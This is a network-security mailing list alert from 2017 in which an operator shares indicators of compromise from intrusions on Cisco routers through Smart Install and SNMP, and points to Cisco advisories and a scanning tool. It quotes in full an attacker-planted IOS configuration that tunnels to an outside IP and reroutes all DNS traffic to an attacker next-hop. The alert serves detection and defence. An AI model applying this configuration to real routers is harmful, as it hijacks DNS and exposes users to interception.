[nsp-sec] [TLP:Yellow] Possible IOS(-XR) SNMP security issue
Dominik Bay
db at rrbone.net
Mon Oct 30 08:53:38 EDT 2017
Please keep an eye out for these bits of configuration. We see them
crafted specific for the router they are deployed on, i.e. different
VLAN-IDs etc.
As you can see they are redirecting DNS traffic, but only for about
30-45 minutes. After this time-frame the configuration is removed again.
conf t
int tun 1972343266
ip addr 23.29.x.y 255.255.255.0
ip nat inside
tun source xyz
tun dest 37.48.92.163
exit
access-list 2543 permit udp any any eq 53
access-list 2543 permit udp any eq 53 any
route-map hop2543
match ip addr 2543
set ip next-hop 23.29.167.71
exit
int Loopback 0
ip policy route-map hop2543
exit
int Vlan 1
ip policy route-map hop2543
exit
end
Cheers,
Dominik
On 10/30/2017 10:22 AM, Dominik Bay wrote:
> ----------- nsp-security Confidential --------
>
> Hi all,
>
> since these intrusions we discovered are based on publicly know issues
>
> - Cisco Smart Install Vulnerability
> - SNMP RW access and bypassing SNMP ACLs via IP-Spoofing
>
> I do not consider this TLP RED anymore, as mentioned in a mail before
> somewhere in the thread.
>
> Please share accordingly with your customers and partners to check for
> this vulnerability and intrusion attempts.
>
> Michael from PSIRT suggested these resources to learn more about the SMI
> vulnerability:
>
> ----8<----
> https://tools.cisco.com/security/center/content/CiscoSecurityResponse/cisco-sr-20170214-smi
>
> If you need a good way to scan a network for devices that have SMI
> enabled, you can use the following tool:
> https://github.com/Cisco-Talos/smi_check
>
> That tool is also mentioned in this blog post by our Talos organization,
> which in turn is referenced in the document Dario referred to:
> http://blog.talosintelligence.com/2017/02/cisco-coverage-for-smart-install-client.html
>
> ---->8----
>
> Cheers,
> Dominik
>
>
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
>
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
> community. Confidentiality is essential for effective Internet security counter-measures.
> _______________________________________________
>
--
rrbone UG (haftungsbeschraenkt) - Ruhrallee 9 - 44139 Dortmund
HR B 23168 Amtsgericht Dortmund - Geschaeftsfuehrer: Dominik Bay
More information about the nsp-security
mailing list